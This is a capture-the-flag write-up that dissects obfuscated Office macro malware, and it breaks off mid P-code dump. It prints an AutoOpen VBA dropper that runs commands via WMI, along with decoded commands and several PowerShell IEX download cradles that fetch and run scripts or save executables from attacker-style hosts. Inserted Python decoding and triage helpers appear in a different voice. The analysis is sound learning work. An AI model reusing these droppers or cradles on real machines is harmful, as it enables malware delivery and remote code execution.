NahamCon CTF 2024 - Macro Madness

Well this was a fun one!

This is a three part challenge, where each individual part awards its own points, and the challenges build on each other.

Also, let it be known I was the 9th out of 40 teams to solve these, granting me the full 1500/1500 points! I did a whole bunch of stuff out of my usual area, so I hope it's okay to feel proud. This was a really fun challenge -- actually probably the most fun one I've done ever!

Part 1

Macros. How do they work?

This sounds like fun! I've never looked at Office doc macro malware before. The provided zip file contains a bunch of xls and doc files. Some or all of these have macros, and many of the macros are apparently benign.

First, there's no way that I'm going to open these docs with macros, nor go through each of the 84 files manually to get them anyway. With a bit of googling, I found an article that covers the excellent oletools. If we, for instance, run olevba Advanced\ Potion\ Making\ for\ Housewives.doc, we get the following output:

olevba 0.60.1 on Python 3.11.9 - https://decalage.info/python/oletools
===============================================================================
FILE: Advanced Potion Making for Housewives.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: Advanced Potion Making for Housewives.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: Advanced Potion Making for Housewives.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Function achieve(believe)
    achieve = Chr(believe - 16)
End Function

Function retrieve(relieve)
    retrieve = Left(relieve, 3)
End Function

Function perceive(deceive)
    perceive = Right(deceive, Len(deceive) - 3)
End Function

Function receive(conceive)
    Do
        grieve = grieve + achieve(retrieve(conceive))
        conceive = perceive(conceive)
    Loop While Len(conceive) > 0
    receive = grieve
End Function

Function MyMacro()
    Dim thieve As String
    Dim sleeve As String
    
    thieve = "128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048126117132121126132130133116117130062121127048061096127130132048072064072064075048125131128113121126132062117136117075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123120113132127128131062115127125074072064072064"
    sleeve = receive(thieve)
    GetObject(receive("135121126125119125132131074")).Get(receive("103121126067066111096130127115117131131")).Create sleeve, reprieve, naive, believe

End Function        

Great! Let's dump them all and figure the rest out later. Unfortunately, I'm not the best with Bash. In a moment of laziness, I went with PowerShell, since I'm fully competent in it. Creating a dump for each doc is as easy as...

┌──(kali㉿kali)-[/home/kali/Downloads/macro-docs]
└─PS> ls | % { olevba $_ > ("dumps/" + $_ + ".vbadump") }

Let's figure out what each one does. First, there are a number of scripts that follow the pattern above:

    thieve = "128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048126117132121126132130133116117130062121127048061096127130132048072064072064075048125131128113121126132062117136117075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123120113132127128131062115127125074072064072064"
    sleeve = receive(thieve)
    GetObject(receive("135121126125119125132131074")).Get(receive("103121126067066111096130127115117131131")).Create sleeve, reprieve, naive, believe        

I found the easiest way to deobfuscate these was to create a simple VB.NET application, since VBA/VBScript are mostly portable to the more powerful VB variant. First, the 135121126125119125132131074 and 103121126067066111096130127115117131131 code is pretty consistent across many scripts, as opposed to the thieve values, so we'll do these two individually.

Module Module1
    Function achieve(believe)
        achieve = Chr(believe - 16)
    End Function

    Function retrieve(relieve)
        retrieve = Left(relieve, 3)
    End Function

    Function perceive(deceive)
        perceive = Right(deceive, Len(deceive) - 3)
    End Function

    Function receive(conceive)
        Dim grieve
        Do
            grieve = grieve + achieve(retrieve(conceive))
            conceive = perceive(conceive)
        Loop While Len(conceive) > 0
        receive = grieve
    End Function

    Sub Main()
        Console.WriteLine(receive("135121126125119125132131074"))
        Console.WriteLine(receive("103121126067066111096130127115117131131"))


        Console.ReadLine()
    End Sub

End Module        

And the values:

winmgmts:
Win32_Process        

Translated back:

GetObject("winmgmts:").Get("Win32_Process").Create sleeve, reprieve, naive, believe
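The same decoding, written here as an added Python example rather than the author's VB.NET program: it mirrors the macro's achieve/retrieve/perceive/receive chain (3-digit groups, minus 16, Chr) and additionally pulls every candidate numeric literal straight out of an olevba dump, so one pass over the dumps directory recovers all the sleeve values. The `offset` parameter and the `decode_dump` scanner are my generalisation, not something the macro itself has.

```python
import re


def achieve(believe: int, offset: int = 16) -> str:
    """Mirror of the macro's achieve(): one 3-digit group minus the offset -> Chr()."""
    return chr(believe - offset)


def receive(conceive: str, offset: int = 16) -> str:
    """Mirror of the macro's receive() loop: Left(s, 3) / Right(s, Len - 3)
    until the string is exhausted. The offset parameter is an assumption
    for reuse on variants; every sample on this page uses 16."""
    if not conceive or not conceive.isdigit() or len(conceive) % 3 != 0:
        # The VBA version would throw on Right(s, Len - 3) with Len < 3;
        # fail loudly instead of silently truncating a literal.
        raise ValueError("expected a non-empty string of 3-digit groups")
    return "".join(achieve(int(conceive[i:i + 3]), offset)
                   for i in range(0, len(conceive), 3))


# Quoted literals of at least three digit-groups, as they appear in olevba output.
ENCODED = re.compile(r'"(\d{9,})"')


def decode_dump(dump_text: str, offset: int = 16) -> list:
    """Return (encoded, decoded) pairs for every candidate literal in a dump."""
    out = []
    for enc in ENCODED.findall(dump_text):
        if len(enc) % 3 == 0:
            out.append((enc, receive(enc, offset)))
    return out


# Constructed excerpt of an olevba dump, built from the two constants that
# recur across the samples (the WMI moniker and the class name).
SAMPLE_DUMP = '''
    sleeve = receive(thieve)
    GetObject(receive("135121126125119125132131074")).Get(receive("103121126067066111096130127115117131131")).Create sleeve, reprieve, naive, believe
'''

if __name__ == "__main__":
    for enc, dec in decode_dump(SAMPLE_DUMP):
        print(f"{enc[:24]}... -> {dec}")
```

Pointing `decode_dump` at the contents of each `*.vbadump` file reproduces the command list below in one go.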

So it's running a process! All those other thieve parts must be the actual calls. Let's extract them all and deobfuscate:

    Sub Main()
        Dim thieve As String() = {
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048126117132121126132130133116117130062121127048061096127130132048072064072064075048125131128113121126132062117136117075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123120113132127128131062115127125074072064072064",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048131132117113124132120113115115117131131062115127125048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063117136128124127121132115117126132130113124062126117132074068068067075048115125116048063115048116121130",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063114113115123116127127130115127126132130127124062114121138075048100117131132061094117132083127126126117115132121127126048114113115123116127127130115127126132130127124062114121138048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063117136128124127121132126117132135127130123062121127074068068067",
"126117132131132113132048061113126",
"132113131123124121131132",
"132130113115117130132048072062072062072062072",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048130127119133117131137131113116125121126062114121138048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063130117116132117113125116117128124127137062115127125074068068067075048100117131132061094117132083127126126117115132121127126048130117116132117113125116117128124127137062115127125048061096127130132048072064072064",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115121128120117130127128117130113132121127126131062126117132048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063125113124115127116117117136115120113126119117062121127075048126127132117128113116062117136117",
"128127135117130115118119048063114113132132117130137130117128127130132",
"118121126116131132130048063121048050117130130127130050048083074108103121126116127135131108092127119131108083082099108083082099062124127119",
"131115120132113131123131048063129133117130137048063118127048092089099100048063134",
"128127135117130131120117124124048081116116061083127126132117126132048061096113132120048050083074108100117125128108124127119062132136132050048061102113124133117048050094117135048124127119048117126132130137050",
"128127135117130131120117124124048098117125127134117061089132117125048061096113132120048050083074108100117125128108124127119062132136132050",
"128127135117130131120117124124048087117132061103121126085134117126132048061092127119094113125117048081128128124121115113132121127126048061093113136085134117126132131048069",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048120113115123117130131128113115117062127130119048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063125113124121115121127133131115127126132130127124062126117132074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115127134117130132127128131115117126132117130062115127125",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048117136128124127121132126117132135127130123062121127048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063133126116117130119130127133126116127128131062126117132075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063115137114117130115127125125113126116128127131132062127130119074068068067",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063138117130127116113137124113114131062115127125075048100117131132061094117132083127126126117115132121127126048138117130127116113137124113114131062115127125048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063115121128120117130127128117130113132121127126131062126117132074068068067",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048121126118121124132130113132117126117132135127130123062127130119048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063116113130123135117114115127126126117115132062115127125075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063130117125127132117117136128124127121132062126117132",
"132137128117048083074108103121126116127135131108099137131132117125067066108116130121134117130131108117132115108120127131132131",
"117115120127048053133131117130126113125117053",
"130127133132117048128130121126132",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063117136113125128124117062115127125",
"128127135117130131120117124124048087117132061103125121095114122117115132048061083124113131131048103121126067066111095128117130113132121126119099137131132117125",
"128127135117130131120117124124048087117132061083120121124116089132117125048061096113132120048083074108048061098117115133130131117",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063116113130123126117132115127126126117115132121127126131062115127125075048126127132117128113116062117136117075048100117131132061094117132083127126126117115132121127126048116113130123126117132115127126126117115132121127126131062115127125048061096127130132048072064",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048130117125127132117117136128124127121132062126117132048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114113115123116127127130117126132130137062127130119074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115124127113123113126116116113119119117130062121127",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048121126134121131121114124117120113126116124117130131062115127125048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063131117115130117132131117131131121127126131062127130119075048131115048131132113130132048135133113133131117130134",
"126117132131132113132048061113126127048140048118121126116131132130048074072064",
"113130128048061113",
"135120127113125121",
"128127135117130131120117124124048099117132061085136117115133132121127126096127124121115137048098117125127132117099121119126117116",
"128127135117130131120117124124048087117132061096130127115117131131048140048099127130132061095114122117115132048083096101048061084117131115117126116121126119048140048099117124117115132061095114122117115132048061086121130131132048065064",
"128127135117130131120117124124048098117131132113130132061083127125128133132117130048061086127130115117",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063125113124121115121127133131120133114062114121138075048131115048131132127128048135133113133131117130134075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063126117132121126132130133116117130062121127",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063114124113115123127128131113115115117131131062121127074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063116113130123115137114117130126117132062115127125075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055115125116062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048073096093048061084113121124137057",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115127134117130132127128131115117126132117130062115127125048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063131120113116127135121126118130113131132130133115132133130117062127130119074072064072064075048125131128113121126132062117136117",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115137114117130131132117113124132120062127130119048061096127130132048068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115137114117130131132117113124132120062127130119075048115113124115062117136117",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115066115127125125113126116062126117132075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055126127132117128113116062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048071081093048061084113121124137057075048100117131132061094117132083127126126117115132121127126048115066115127125125113126116062126117132048061096127130132048072064",
"128127135117130131120117124124048094117135061089132117125048061096113132120048050083074108100117125128050048061089132117125100137128117048084121130117115132127130137",
"128127135117130131120117124124048083127128137061089132117125048061096113132120048050083074108100117125128050048061084117131132121126113132121127126048050084074108082113115123133128050048061098117115133130131117",
"128127135117130131120117124124048099132113130132061096130127115117131131048061086121124117096113132120048050126127132117128113116062117136117050048061081130119133125117126132092121131132048050083074108100117125128108132117131132062132136132050",
"118131133132121124048118131121126118127048116130121134117131",
"132113131123123121124124048063086048063089093048126127132117128113116062117136117",
"135117134132133132121124048129117048099137131132117125048063115074065064048063130116074132130133117048063118074132117136132",
"135125121115048129118117048124121131132048114130121117118048063118127130125113132074132113114124117",
"116121131123128113130132048063131048131115130121128132062132136132",
"130117119048129133117130137048050088091092093108099127118132135113130117108093121115130127131127118132108103121126116127135131108083133130130117126132102117130131121127126108098133126050",
"128127135117130131120117124124048099132113130132061099117130134121115117048061094113125117048050135133113133131117130134050",
"128127135117130131120117124124048099132127128061099117130134121115117048061094113125117048050135133113133131117130134050",
"128127135117130131120117124124048098117131132113130132061099117130134121115117048061094113125117048050099128127127124117130050",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063131120113116127135131117130134117130062126117132075048131115048131132113130132048135133113133131117130134075048100117131132061094117132083127126126117115132121127126048131120113116127135131117130134117130062126117132048061096127130132048068068067",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115127134117130132115127126132130127124062126117132075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063127114131115133130117127128131062127130119074072064072064075048131115048131132127128048131128127127124117130",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063115137114117130115127125125113126116115117126132117130062126117132075048100117131132061094117132083127126126117115132121127126048115137114117130115127125125113126116115117126132117130062126117132048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063121126134121131121114124117120113126116124117130131062115127125074068068067",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048116113130123115137114117130126117132062115127125048061096127130132048072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063131132117113124132120126117132135127130123062121127075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063120113115123117130131128113115117062127130119",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063128113137124127113116116121131128113132115120062127130119074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063131132117113124132120113115115117131131062115127125075048131115048131132113130132048131128127127124117130",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063119120127131132121126118130113131132130133115132133130117062121127075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063130127119133117131137131113116125121126062114121138075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055115113124115062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048070096093048061084113121124137057",
"116121130",
"121128115127126118121119048063113124124",
"128121126119048119127127119124117062115127125",
"132117124126117132048132127135117124062114124121126123117126124121119120132131062126124",
"126117132048133131117048106074048108108118121124117131117130134117130108131120113130117116",
"131120133132116127135126048063130048063132048064",
"126131124127127123133128048117136113125128124117062115127125",
"131137131132117125121126118127",
"126117132048133131117130",
"128127135117130131120117124124048087117132061096130127115117131131",
"128127135117130131120117124124048087117132061099117130134121115117",
"128127135117130131120117124124048087117132061085134117126132092127119048061092127119094113125117048099137131132117125048061094117135117131132048065064",
"131115048129133117130137048131132113132117077048113124124",
"119128133128116113132117048063118127130115117",
"131118115048063131115113126126127135",
"128127135117130131120117124124048087117132061094117132089096083127126118121119133130113132121127126",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048119127127119124117062115127125",
"128127135117130131120117124124048087117132061083127125125113126116048061093127116133124117048094117132100083096089096",
"128127135117130131120117124124048089126134127123117061098117131132093117132120127116048061101130121048050120132132128131074063063113128121062119121132120133114062115127125063130117128127131063128127135117130131120117124124063128127135117130131120117124124050",
"128127135117130131120117124124048100117131132061083127126126117115132121127126048061083127125128133132117130094113125117048072062072062072062072",
"128127135117130131120117124124048087117132061083127126132117126132048061096113132120048050083074108103121126116127135131108099137131132117125067066108116130121134117130131108117132115108120127131132131050",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048050120132132128074063063117136113125128124117062115127125050048061095133132086121124117048050083074108100117125128108117136113125128124117062120132125124050",
"128127135117130131120117124124048094117135061099125114099120113130117048061094113125117048050100117125128099120113130117050048061096113132120048050083074108100117125128050048061086133124124081115115117131131048085134117130137127126117",
"128127135117130131120117124124048098117125127134117061099125114099120113130117048061094113125117048050100117125128099120113130117050",
"128127135117130131120117124124048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063120121116116117126115127125125131062114121138074068068067075048089126134127123117061103117114098117129133117131132048061101130121048120132132128074063063121126118121124132130113132117126117132135127130123062127130119075048094117135061099115120117116133124117116100113131123048061081115132121127126048056094117135061099115120117116133124117116100113131123081115132121127126048061085136117115133132117048055125131128113121126132062117136117055057048061100130121119119117130048056094117135061099115120117116133124117116100113131123100130121119119117130048061081132048072081093048061084113121124137057",
"128127135117130131120117124124048100117131132061094117132083127126126117115132121127126048115124127113123113126116116113119119117130062121127048061096127130132048072064072064075048089126134127123117061103117114098117129133117131132048061101130121048120132132128131074063063133126116117132117115132113114124117127128131062114121138074072064072064075048115113124115062117136117"
        }

        For Each x In thieve
            Console.WriteLine(receive(x))
        Next

        Console.ReadLine()
    End Sub        

And the calls:

powershell Test-NetConnection netintruder.io -Port 8080; mspaint.exe; Invoke-WebRequest -Uri https://blackhatops.com:8080
powershell Test-NetConnection stealthaccess.com -Port 8080; Invoke-WebRequest -Uri https://exploitcentral.net:443; cmd /c dir
powershell Invoke-WebRequest -Uri https://backdoorcontrol.biz; Test-NetConnection backdoorcontrol.biz -Port 80; Invoke-WebRequest -Uri https://exploitnetwork.io:443
netstat -an
tasklist
tracert 8.8.8.8
powershell Test-NetConnection roguesysadmin.biz -Port 443; Invoke-WebRequest -Uri https://redteamdeploy.com:443; Test-NetConnection redteamdeploy.com -Port 8080
powershell Test-NetConnection cipheroperations.net -Port 8080; Invoke-WebRequest -Uri https://malcodeexchange.io; notepad.exe
powercfg /batteryreport
findstr /i "error" C:\Windows\Logs\CBS\CBS.log
schtasks /query /fo LIST /v
powershell Add-Content -Path "C:\Temp\log.txt" -Value "New log entry"
powershell Remove-Item -Path "C:\Temp\log.txt"
powershell Get-WinEvent -LogName Application -MaxEvents 5
powershell Test-NetConnection hackerspace.org -Port 443; Invoke-WebRequest -Uri https://maliciouscontrol.net:443; Invoke-WebRequest -Uri https://covertopscenter.com
powershell Test-NetConnection exploitnetwork.io -Port 8080; Invoke-WebRequest -Uri https://undergroundops.net; Invoke-WebRequest -Uri https://cybercommandpost.org:443
powershell Invoke-WebRequest -Uri https://zerodaylabs.com; Test-NetConnection zerodaylabs.com -Port 80; Invoke-WebRequest -Uri https://cipheroperations.net:443
powershell Test-NetConnection infiltratenetwork.org -Port 80; Invoke-WebRequest -Uri https://darkwebconnect.com; Invoke-WebRequest -Uri https://remoteexploit.net
type C:\Windows\System32\drivers\etc\hosts
echo %username%
route print
powershell Invoke-WebRequest -Uri https://example.com
powershell Get-WmiObject -Class Win32_OperatingSystem
powershell Get-ChildItem -Path C:\ -Recurse
powershell Invoke-WebRequest -Uri https://darknetconnections.com; notepad.exe; Test-NetConnection darknetconnections.com -Port 80
powershell Test-NetConnection remoteexploit.net -Port 443; Invoke-WebRequest -Uri https://backdoorentry.org:443; Invoke-WebRequest -Uri https://cloakanddagger.io
powershell Test-NetConnection invisiblehandlers.com -Port 8080; Invoke-WebRequest -Uri https://secretsessions.org; sc start wuauserv
netstat -ano | findstr :80
arp -a
whoami
powershell Set-ExecutionPolicy RemoteSigned
powershell Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
powershell Restart-Computer -Force
powershell Invoke-WebRequest -Uri https://malicioushub.biz; sc stop wuauserv; Invoke-WebRequest -Uri https://netintruder.io
powershell Invoke-WebRequest -Uri https://blackopsaccess.io:443; Invoke-WebRequest -Uri https://darkcybernet.com; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -Trigger (New-ScheduledTaskTrigger -At 9PM -Daily)
powershell Test-NetConnection covertopscenter.com -Port 8080; Invoke-WebRequest -Uri https://shadowinfrastructure.org:8080; mspaint.exe
powershell Test-NetConnection cyberstealth.org -Port 443; Invoke-WebRequest -Uri https://cyberstealth.org; calc.exe
powershell Invoke-WebRequest -Uri https://c2command.net; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'notepad.exe') -Trigger (New-ScheduledTaskTrigger -At 7AM -Daily); Test-NetConnection c2command.net -Port 80
powershell New-Item -Path "C:\Temp" -ItemType Directory
powershell Copy-Item -Path "C:\Temp" -Destination "D:\Backup" -Recurse
powershell Start-Process -FilePath "notepad.exe" -ArgumentList "C:\Temp\test.txt"
fsutil fsinfo drives
taskkill /F /IM notepad.exe
wevtutil qe System /c:10 /rd:true /f:text
wmic qfe list brief /format:table
diskpart /s script.txt
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
powershell Start-Service -Name "wuauserv"
powershell Stop-Service -Name "wuauserv"
powershell Restart-Service -Name "Spooler"
powershell Invoke-WebRequest -Uri https://shadowserver.net; sc start wuauserv; Test-NetConnection shadowserver.net -Port 443
powershell Invoke-WebRequest -Uri https://covertcontrol.net; Invoke-WebRequest -Uri https://obscureops.org:8080; sc stop spooler
powershell Invoke-WebRequest -Uri https://cybercommandcenter.net; Test-NetConnection cybercommandcenter.net -Port 80; Invoke-WebRequest -Uri https://invisiblehandlers.com:443
powershell Test-NetConnection darkcybernet.com -Port 80; Invoke-WebRequest -Uri https://stealthnetwork.io; Invoke-WebRequest -Uri https://hackerspace.org
powershell Invoke-WebRequest -Uri https://payloaddispatch.org:443; Invoke-WebRequest -Uri https://stealthaccess.com; sc start spooler
powershell Invoke-WebRequest -Uri https://ghostinfrastructure.io; Invoke-WebRequest -Uri https://roguesysadmin.biz; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'calc.exe') -Trigger (New-ScheduledTaskTrigger -At 6PM -Daily)
dir
ipconfig /all
ping google.com
telnet towel.blinkenlights.nl
net use Z: \\fileserver\shared
shutdown /r /t 0
nslookup example.com
systeminfo
net user
powershell Get-Process
powershell Get-Service
powershell Get-EventLog -LogName System -Newest 10
sc query state= all
gpupdate /force
sfc /scannow
powershell Get-NetIPConfiguration
powershell Test-NetConnection google.com
powershell Get-Command -Module NetTCPIP
powershell Invoke-RestMethod -Uri "https://api.github.com/repos/powershell/powershell"
powershell Test-Connection -ComputerName 8.8.8.8
powershell Get-Content -Path "C:\Windows\System32\drivers\etc\hosts"
powershell Invoke-WebRequest -Uri "https://example.com" -OutFile "C:\Temp\example.html"
powershell New-SmbShare -Name "TempShare" -Path "C:\Temp" -FullAccess Everyone
powershell Remove-SmbShare -Name "TempShare"
powershell Invoke-WebRequest -Uri https://hiddencomms.biz:443; Invoke-WebRequest -Uri https://infiltratenetwork.org; New-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'mspaint.exe') -Trigger (New-ScheduledTaskTrigger -At 8AM -Daily)
powershell Test-NetConnection cloakanddagger.io -Port 8080; Invoke-WebRequest -Uri https://undetectableops.biz:8080; calc.exe        

The most alarming thing any of these do is make web requests, but nothing is actually saved or executed. Let's leave them for now and find some other interesting ones.

A few look something like this:

Sub MyMacros()
    Dim str As String
    str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://netintruder.io/command.ps1')"
    Shell str, vbHide
    Wait (2)
End Sub        

With other variations:

str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://netintruder.io/command.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadString('https://shadowserver.net/inject.ps1') | iex"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://darknetconnections.com/malware.exe', 'malware.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://redteamdeploy.com/shell.ps1')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://hiddencomms.biz/initiate.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://exploitcentral.net/exploit.exe', 'exploit.exe')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://malcodeexchange.io/agent.exe', 'agent.exe')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://obscureops.org/dropper.exe', 'dropper.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://payloaddispatch.org/runme.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://c2command.net/backdoor.exe', 'backdoor.exe')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://malicioushub.biz/trojan.exe', 'trojan.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://cyberstealth.org/payload.ps1')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://undergroundnet.org/loader.ps1')"
str = "powershell New-Object System.Net.WebClient).DownloadFile('https://blackopsaccess.io/spyware.exe', 'spyware.exe')"
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://zerodaylabs.com/hack.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://roguesysadmin.biz/virus.exe', 'virus.exe')"        

Some of these only drop an executable to disk (DownloadFile) without running it; the rest fetch a script and run it straight in memory (DownloadString handed to iex). I tried curling them all, but none of them exist! Maybe they did before. For now, let's see what else there is. Actually, there's exactly one more!
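Sorting these by hand works for a dozen macros but not for a corpus, so here is an added Python triage helper (mine, not part of the original write-up) that pulls the URL out of each PowerShell one-liner and classifies it as in-memory execution (IEX / Invoke-Expression present), drop-to-disk (DownloadFile with a destination path), or download-only. The sample input is a constructed subset of the `str = "..."` variants listed above; the function and class names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a few of the str = "..." lines quoted above, one per line,
# including the variant with the missing opening parenthesis.
SAMPLE_MACRO_LINES = r'''
str = "powershell IEX (New-Object Net.WebClient).DownloadString('https://netintruder.io/command.ps1')"
str = "powershell (New-Object System.Net.WebClient).DownloadString('https://shadowserver.net/inject.ps1') | iex"
str = "powershell (New-Object System.Net.WebClient).DownloadFile('https://darknetconnections.com/malware.exe', 'malware.exe')"
str = "powershell New-Object System.Net.WebClient).DownloadFile('https://blackopsaccess.io/spyware.exe', 'spyware.exe')"
'''

URL_RE = re.compile(r"'(https?://[^']+)'")
# IEX or Invoke-Expression anywhere in the command means the fetched text runs in memory.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
# DownloadFile('<url>', '<local path>') means the payload lands on disk.
FILE_RE = re.compile(r"DownloadFile\('[^']+',\s*'([^']+)'\)", re.IGNORECASE)


@dataclass
class Cradle:
    url: str
    host: str
    verdict: str                 # "exec-in-memory", "drop-to-disk" or "download-only"
    dropped_path: Optional[str]  # only set for drop-to-disk


def classify(command: str) -> Optional[Cradle]:
    """Classify one PowerShell download cradle; None if no URL is present."""
    m = URL_RE.search(command)
    if not m:
        return None
    url = m.group(1)
    host = re.sub(r"^https?://", "", url).split("/", 1)[0]
    drop = FILE_RE.search(command)
    if EXEC_RE.search(command):
        verdict = "exec-in-memory"
    elif drop:
        verdict = "drop-to-disk"
    else:
        verdict = "download-only"
    return Cradle(url, host, verdict, drop.group(1) if drop else None)


def triage(macro_text: str) -> List[Cradle]:
    """Run classify() over every line that invokes powershell."""
    found = []
    for line in macro_text.splitlines():
        if "powershell" not in line.lower():
            continue
        cradle = classify(line)
        if cradle:
            found.append(cradle)
    return found


if __name__ == "__main__":
    for c in triage(SAMPLE_MACRO_LINES):
        print(f"{c.verdict:15} {c.host:26} {c.url}  drop={c.dropped_path}")
```

Feed it the concatenated olevba output of the whole directory and the host column doubles as an IOC list; the verdict column tells you which samples would have left an artifact on disk and which only ever lived in memory.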

VBA MACRO VBA_P-code.txt 
in file: VBA P-code - OLE stream: 'VBA P-code'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' Processing file: Space Pirate Code of Conduct.doc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 938 bytes
' Macros/VBA/Module1 - 4293 bytes
' Line #0:
' 	FuncDefn (Function Sleep(ByVal mili As Long) As Long)
' Line #1:
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	ArgsCall MyMacro 0x0000 
' Line #4:
' 	EndSub 
' Line #5:
' Line #6:
' 	FuncDefn (Sub Document_Open())
' Line #7:
' 	ArgsCall MyMacro 0x0000 
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Function achieve(believe))
' Line #11:
' 	Ld believe 
' 	LitDI2 0x0010 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	St achieve 
' Line #12:
' 	EndFunc 
' Line #13:
' Line #14:
' 	FuncDefn (Function retrieve(relieve))
' Line #15:
' 	Ld relieve 
